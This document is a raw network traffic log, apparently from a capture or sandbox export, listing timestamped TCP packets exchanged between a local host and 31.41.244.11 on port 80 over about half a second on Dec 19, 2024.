                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.626859903 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.626895905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.626954079 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.635149002 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.635258913 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.635267973 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.635370016 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.643528938 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.643601894 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.643603086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.643666029 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.651897907 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.652013063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.652028084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.652154922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.660309076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.660399914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.660461903 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.660512924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.667468071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.667536020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.667588949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.667644024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.674748898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.674815893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.674846888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.674913883 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.781130075 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.781176090 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.781189919 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.781228065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.783392906 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.783433914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.783514023 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.783555984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.787856102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.787899017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.787986994 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.788027048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.792372942 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.792417049 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.792459011 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.792495012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.796868086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.796911955 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.796936989 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.796969891 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.801357031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.801430941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.801486969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.801523924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.805852890 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.805897951 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.805943966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.805978060 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.810312033 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.810353994 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.810420990 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.810456991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.814789057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.814918041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.814929008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.814965963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.819293976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.819338083 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.819375992 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.819411993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.823760986 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.823800087 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.823875904 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.823909998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.828211069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.828248024 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.828321934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.828362942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.832726955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.832776070 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.832891941 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.832926989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.837212086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.837249041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.837346077 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.837380886 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.841680050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.841718912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.841789961 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.841830015 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.846163988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.846203089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.846271992 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.846313000 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.850675106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.850714922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.850753069 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.850788116 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.855179071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.855216026 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.855298996 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.855329990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.859565973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.859601021 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.859642029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.859671116 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.864095926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.864146948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.864188910 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.864223003 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.868551970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.868597031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.868613005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.868643045 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.873023987 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.873060942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.873097897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.873132944 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.877485991 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.877528906 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.877631903 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.877667904 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.881983995 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.882024050 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.882055044 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.882085085 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.973242998 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.973287106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.973323107 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.973429918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.974899054 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.974961996 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.975033045 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.975085020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.978543043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.978599072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.979862928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.979922056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.980003119 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.980047941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.983433962 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.983504057 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.983570099 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.983624935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.986995935 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.987057924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.987126112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.987179041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.990369081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.990423918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.990489960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.990550041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.993844986 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.993901014 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.993911028 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.993956089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.997107029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.997165918 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.997257948 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:20.997319937 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.000315905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.000375986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.000446081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.000503063 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.003477097 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.003535986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.003611088 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.003662109 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.006612062 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.006668091 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.006757021 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.006824970 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.009749889 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.009809017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.009881973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.009946108 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.012849092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.012886047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.012912035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.012937069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.015861988 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.015916109 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.015917063 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.015964985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.018990993 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.019046068 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.019099951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.019154072 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.021795034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.021859884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.021899939 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.021955013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.024970055 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.025007963 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.025034904 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.025067091 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.027857065 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.027915955 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.027978897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.028034925 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.030910015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.030961990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.030994892 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.031044006 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.033905029 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.033979893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.034038067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.034094095 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.036983967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.037039995 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.037041903 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.037092924 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.039944887 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.039999008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.040075064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.040138960 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.043035984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.043072939 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.043102026 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.043128014 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.046027899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.046128035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.046158075 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.046212912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.049035072 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.049093008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.049124002 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.049174070 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.052021027 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.052083015 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.052158117 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.052201986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.055041075 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.055104017 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.055176020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.055226088 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.058104038 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.058166027 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.058192015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.058248043 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.061156034 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.061232090 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.061289072 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.061343908 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.064136028 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.064205885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.064253092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.064311028 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.067136049 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.067203999 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.067256927 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.067327023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.070261002 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.070313931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.070390940 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.070440054 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.073193073 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.073246002 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.073309898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.073360920 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.076211929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.076323986 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.076328039 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.076370955 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.079288960 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.079396963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.079488039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.079541922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.082304001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.082361937 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.082432985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.082484961 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.085269928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.085324049 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.085386992 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.085434914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.088304996 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.088366032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.164951086 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.165021896 CET4978780192.168.2.431.41.244.11
